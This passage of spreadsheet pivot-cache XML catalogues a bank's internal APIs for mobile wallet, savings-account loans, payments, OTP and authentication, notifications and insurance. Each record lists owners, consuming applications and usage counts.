    <n v="110"/>
    <s v="gwe-JWK-wallet"/>
    <s v="Un JWK (JSON Web key) es una estructura de datos JSON que representa una clave criptográfica."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="8154"/>
    <n v="7637"/>
    <n v="122095"/>
    <n v="203064"/>
    <n v="226212"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-03T03:18:39"/>
    <s v="Gwe-Legal Wallet"/>
    <n v="111"/>
    <s v="Gwe-Legal - Terms and Conditions"/>
    <n v="111"/>
    <s v="gwe-legal-terms-and-conditions"/>
    <s v="Permite realizar operaciones relacionadas a los términos y condiciones de uso de billetera móvil en la App Personas, entre las operaciones se encuentran: - Consultar los términos y condiciones - Aceptar términos y condiciones de un usuario especí­fico - Consultar si un usuario ya aceptó los términos y condiciones"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="2901"/>
    <n v="2813"/>
    <n v="45338"/>
    <n v="82349"/>
    <n v="100872"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:27:25"/>
    <s v="Gwe-Loans ALM"/>
    <n v="103"/>
    <s v="Gwe-Loans ALM - Payment Loan"/>
    <n v="102"/>
    <s v="gwe-loans-alm-payment"/>
    <s v="(Trx 0621) encargada de desembolsar el crédito de acuerdo a los parámetros fijados por el cliente y el sistema"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="761"/>
    <n v="833"/>
    <n v="9286"/>
    <n v="30141"/>
    <n v="52382"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T14:22:19"/>
    <s v="Gwe-Loans ALM"/>
    <n v="103"/>
    <s v="Gwe-Loans ALM - Payment Loan Update State"/>
    <n v="100"/>
    <s v="gwe-loans-alm-payment-loan-update-state"/>
    <s v="Actualiza estado de precalculado a vendido"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="204"/>
    <n v="295"/>
    <n v="4016"/>
    <n v="6321"/>
    <n v="11652"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T14:22:19"/>
    <s v="Gwe-Loans ALM"/>
    <n v="103"/>
    <s v="Gwe-Loans ALM - Pre Loan Query"/>
    <n v="100"/>
    <s v="gwe-loans-alm-pre-loan-query"/>
    <s v="El servicio Crédito a la mano tiene como finalidad ofrecer a los clientes de ahorro a la mano un prestamo con abono inmediato en su cuenta al momento de aceptarlo. Una vez que el cliente se auntentique dentro de la aplicación se dispara la una nueva transacción (Trx 0619) consulta preaprobado, esta va a integración, donde integración consume un SP (store procedure) y realizala consulta del cliente en una base de datos Oracle, la cual nos devuelve si el cliente posee una oferta de un prestamo preaprobado, si el cliente posee una oferta y la acepta se dispara la nueva transacción (Trx 0621) el desembolso del prestamo, donde a tráves de esta cosumimos un servicio expuesto por el departamento de carteras, y de manera automatica se efectuará el crédito a la cuenta del cliente, y por ultimo se dispara otra nueva transacción (Trx 0622) Actualización del preaprobado, donde se marcara en la base de datos Oracle que la oferta ya fue vendida, esta funciona bajo la misma filosofia de la consulta del preaprobado, vamos a integración y ellos a traves del SP actualizan la información del prestamo."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="810083"/>
    <n v="841425"/>
    <n v="22365500"/>
    <n v="29405581"/>
    <n v="35310545"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-09-13T16:56:05"/>
    <s v="Gwe-Notifications"/>
    <n v="105"/>
    <s v="Gwe-Notification - Send Email Basic"/>
    <n v="103"/>
    <s v="gwe-notification-send-email-basic"/>
    <s v="No tiene Descipcion"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="EnvioCorreoElectronico/V1.0"/>
    <s v="Masivia"/>
    <s v="AppNotifications_AW0360009 _x000d__x000a_ Tracking_AW1286001 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ PayProMerchant_AW1235001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TPM ALM APP_AW0955001"/>
    <n v="1308"/>
    <n v="881"/>
    <n v="14105"/>
    <n v="31279"/>
    <n v="55684"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-09-13T16:56:05"/>
    <s v="Gwe-Notifications"/>
    <n v="105"/>
    <s v="Gwe-Notification - Send SMS Massive"/>
    <n v="104"/>
    <s v="gwe-notification-send-sms-massive"/>
    <s v="El Api permite realizar el envio de mensajes SMS a través del proveedor de delivery Inalambria. Este servicio esté enfocado a consumidores transaccionales que realizan envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="EnvioSmsInalambria/V1.0"/>
    <s v="PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011"/>
    <s v="AppNotifications_AW0360009 _x000d__x000a_ Tracking_AW1286001 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ PayProMerchant_AW1235001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TPM ALM APP_AW0955001"/>
    <n v="396"/>
    <n v="346"/>
    <n v="7665"/>
    <n v="25591"/>
    <n v="42697"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-12-03T12:02:45"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-OAuth - Provider for ALM"/>
    <n v="107"/>
    <s v="gwe-oauth-alm"/>
    <s v="Proveedor de OAuth para ALM"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-06-17T23:10:49"/>
    <s v="Gwe-Security"/>
    <n v="104"/>
    <s v="Gwe-OAuth - Provider from WAS Validator Code"/>
    <n v="104"/>
    <s v="gwe-oauth-otp"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="43"/>
    <n v="85"/>
    <n v="905"/>
    <n v="739"/>
    <n v="1022"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-08-30T18:05:56"/>
    <s v="Gwe-Payments"/>
    <n v="106"/>
    <s v="Gwe-Payments - Create Recharge"/>
    <n v="100"/>
    <s v="gwe-payments-create-recharge"/>
    <s v="Service that allows recharging different services such as Entertainment, public services, mobile telephony, TV."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ Ecosistema De Pagos_AW1314001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-22T03:10:52"/>
    <s v="Gwe-Payments Wallet"/>
    <n v="110"/>
    <s v="Gwe-Payments - QR Payments"/>
    <n v="110"/>
    <s v="gwe-payments-qr-payments"/>
    <s v="Permite realizar pagos con código QR en billetera móvil en la App Personas"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="307"/>
    <n v="283"/>
    <n v="9505"/>
    <n v="17756"/>
    <n v="25535"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-26T11:37:21"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Create PIN"/>
    <n v="105"/>
    <s v="gwe-payments-alm-create-pin"/>
    <s v="El API permite realizar la generación de un pin para transferencia de dinero entre cuentas de Bancolombia Ahorro a la Mano Para Realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden: 1. Generar Pin de Pago (Esta API) 2. Enviar el Dinero (Gwe-Payments ALM - Send Money) "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2622"/>
    <n v="4319"/>
    <n v="10033"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Create PIN"/>
    <n v="107"/>
    <s v="gwe-payments-alm-create-pin"/>
    <s v="El API permite realizar la generación de un pin para transferencia de dinero entre cuentas de Bancolombia Ahorro a la Mano Para Realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden: 1. Generar Pin de Pago (Esta API) 2. Enviar el Dinero (Gwe-Payments ALM - Send Money) "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="6075828"/>
    <n v="8275364"/>
    <n v="9872008"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:34:27"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Financial Agreement Light Query"/>
    <n v="101"/>
    <s v="gwe-payments-alm-financial-agreement-light-query"/>
    <s v="El API tiene como objetivo hacer una consulta detallada de un convenio Adhoc, Presenment y REDEBAN"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6343"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Financial Agreement Light Query"/>
    <n v="102"/>
    <s v="gwe-payments-alm-financial-agreement-light-query"/>
    <s v="El API tiene como objetivo hacer una consulta detallada de un convenio Adhoc, Presenment y REDEBAN"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <n v="18102"/>
    <n v="22313"/>
    <n v="503801"/>
    <n v="574539"/>
    <n v="648194"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:34:27"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Financial Agreement Query"/>
    <n v="101"/>
    <s v="gwe-payments-alm-financial-agreement-query"/>
    <s v="Esta APi tiene como objetivo consultar y listar los convenios existentes"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2619"/>
    <n v="4316"/>
    <n v="10029"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Financial Agreement Query"/>
    <n v="102"/>
    <s v="gwe-payments-alm-financial-agreement-query"/>
    <s v="Esta APi tiene como objetivo consultar y listar los convenios existentes"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="152184"/>
    <n v="155153"/>
    <n v="3722015"/>
    <n v="5605308"/>
    <n v="6190936"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-26T14:32:23"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Payment Bill"/>
    <n v="103"/>
    <s v="gwe-payments-alm-payment-bill"/>
    <s v="El API tiene como objetivo realizar el pago de una factura Adhoc, Presenment y REDEBAN "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6345"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Payment Bill"/>
    <n v="104"/>
    <s v="gwe-payments-alm-payment-bill"/>
    <s v="El API tiene como objetivo realizar el pago de una factura Adhoc, Presenment y REDEBAN "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <n v="9049"/>
    <n v="8592"/>
    <n v="152037"/>
    <n v="287411"/>
    <n v="307751"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-16T10:21:35"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Send Money"/>
    <n v="106"/>
    <s v="gwe-payments-alm-send-money"/>
    <s v="Para realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden:   1. Generar Pin de Pago (Gwe-Payments ALM - Create PIN)   2. Enviar el Dinero (Esta API)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2621"/>
    <n v="4313"/>
    <n v="4463"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Send Money"/>
    <n v="201"/>
    <s v="gwe-payments-alm-send-money"/>
    <s v="Para realizar una transferencia entre cuentas de ALM se debe seguir el siguiente orden:   1. Generar Pin de Pago (Gwe-Payments ALM - Create PIN)   2. Enviar el Dinero (Esta API)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="191930"/>
    <n v="204974"/>
    <n v="4214475"/>
    <n v="6780818"/>
    <n v="7608985"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T15:46:28"/>
    <s v="Gwe-Payments ALM"/>
    <n v="114"/>
    <s v="Gwe-Payments ALM - Send Payment Receipt"/>
    <n v="106"/>
    <s v="gwe-payments-alm-send-payment-receipt"/>
    <s v="El API permite enviar por correo un comprobante de transferencia de dinero realizada entre cuentas de Bancolombia a La Mano (BLM)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-23T03:36:41"/>
    <s v="Gwe-Payments ALM"/>
    <n v="202"/>
    <s v="Gwe-Payments ALM - Send Payment Receipt"/>
    <n v="107"/>
    <s v="gwe-payments-alm-send-payment-receipt"/>
    <s v="El API permite enviar por correo un comprobante de transferencia de dinero realizada entre cuentas de Bancolombia a La Mano (BLM)"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-06T01:58:19"/>
    <s v="Gwe-Register"/>
    <n v="120"/>
    <s v="Gwe-Register - Wallet"/>
    <n v="120"/>
    <s v="gwe-register-wallet"/>
    <s v="Esta API permite realizar las siguientes operaciones: - Registrar billeteras  - Consultar si un usuario ya tiene una billetera registrada."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="13673"/>
    <n v="13128"/>
    <n v="212405"/>
    <n v="367010"/>
    <n v="412860"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-06T01:59:16"/>
    <s v="Gwe-RSK Wallet"/>
    <n v="120"/>
    <s v="Gwe-RSK - Wallet"/>
    <n v="120"/>
    <s v="gwe-rsk-wallet"/>
    <s v="Esta API permite registrar y revocar llaves para el consumo de las APIs que requieren información privada de usuario en Wallet Server"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="11186"/>
    <n v="10763"/>
    <n v="171282"/>
    <n v="290779"/>
    <n v="329890"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:53:40"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Authentication"/>
    <n v="106"/>
    <s v="gwe-security-alm-authentication"/>
    <s v="El API permite realizar la autenticación de clientes para la aplicación de Bancolombia a la Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6344"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:53:40"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Change Password"/>
    <n v="105"/>
    <s v="gwe-security-alm-change-password"/>
    <s v="El API permite realizar el cambio de contraseña del cliente de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="82"/>
    <n v="54"/>
    <n v="1180"/>
    <n v="2028"/>
    <n v="8587"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-23T18:03:59"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Collection OTP Generation"/>
    <n v="103"/>
    <s v="gwe-security-alm-collection-otp-generation"/>
    <s v="API para la generacion de OTP de recaudos"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="9558"/>
    <n v="8918"/>
    <n v="187478"/>
    <n v="302564"/>
    <n v="347959"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-09-11T09:32:52"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - OTP Management"/>
    <n v="107"/>
    <s v="gwe-security-alm-otp-management"/>
    <s v="Esta API permite realizar la generación de OTPs para Bancolombia Ahorro a la Mano, en los casos que se requieran realizar las siguientes solicitudes:   - 061201 -&gt; Vinculación OTP Incial   - 061202 -&gt; Vinculación OTP al celular   - 061801 -&gt; Vinculación Centralizada   - 061501 -&gt; Reexpedición OTP Incial   - 061502 -&gt; Reexpedición OTP cambio de número   - 061601 -&gt; Cambio de correo   - 041301 -&gt; Cambio de clave "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="72963"/>
    <n v="75377"/>
    <n v="1733982"/>
    <n v="2635731"/>
    <n v="2662445"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:53:40"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-Security ALM - Set Password"/>
    <n v="107"/>
    <s v="gwe-security-alm-set-password"/>
    <s v="Esta API tiene como objetivo asignar la contraseña a una cuenta de ahorro Bancolombia Ahorro a la Mano, cuando el cliente ha sido registrado de forma centralizada (Cuando es una cuenta de nómina)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="15"/>
    <n v="15"/>
    <n v="3265"/>
    <n v="5408"/>
    <n v="5312"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-02-28T09:35:36"/>
    <s v="Gwe-Parameter-Wallet"/>
    <n v="110"/>
    <s v="Gwe-Wallet - Parameter Management"/>
    <n v="110"/>
    <s v="gwe-wallet-parameter-management"/>
    <s v="Este servicio permitirá exponer las diferentes funcionalidades de creación, modificación, consulta y eliminación de los parámetros propios para el canal Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="414"/>
    <n v="390"/>
    <n v="6921"/>
    <n v="12382"/>
    <n v="16420"/>
    <x v="6"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Inscripcion De Facturas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio realiza la inscripción de una factura en el sistema de recaudos, incluyendo consulta de la inscripción de la factura del cliente, modificación a la inscripción de la factura y eliminación de la inscripción de la factura."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="SCI _x000d__x000a_CNB _x000d__x000a_ALM _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_SRC _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_SVE _x000d__x000a_ATM _x000d__x000a_AUD _x000d__x000a_FAC _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T14:29:01"/>
    <s v="Insurance Health"/>
    <n v="100"/>
    <s v="Insurance Health - Issue"/>
    <n v="100"/>
    <s v="insurance-health-issue"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="1"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T14:29:01"/>
    <s v="Insurance Health"/>
    <n v="100"/>
    <s v="Insurance Health - Quote"/>
    <n v="100"/>
    <s v="insurance-health-quote"/>
    <s v="No tiene Descipcion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="2"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T15:03:01"/>
    <s v="Insurance Life"/>
    <n v="100"/>
    <s v="Insurance Life - Issue"/>
    <n v="100"/>
    <s v="insurance-life-issue"/>
    <s v="Api que genera la expedición de la póliza del seguro solicitado por el cliente. La información que entrega: - ID correspondiente a la expedición de la póliza"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Seguros"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="7"/>
    <m/>
    <n v="1"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-04T15:03:01"/>
    <s v="Insurance Life"/>
    <n v="100"/>
    <s v="Insurance Life - Quote"/>
    <n v="100"/>
    <s v="insurance-life-quote"/>
    <s v="Api que ayuda a generar una simulación del seguro solicitado por el cliente.  La información que entrega: - Nombre de la cobertura - Fecha en que se efectíºa la cotización - Valor asegurado por cobertura - Valor de la prima sin IVA - Valor del IVA - Total de la prima con IVA incluido"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
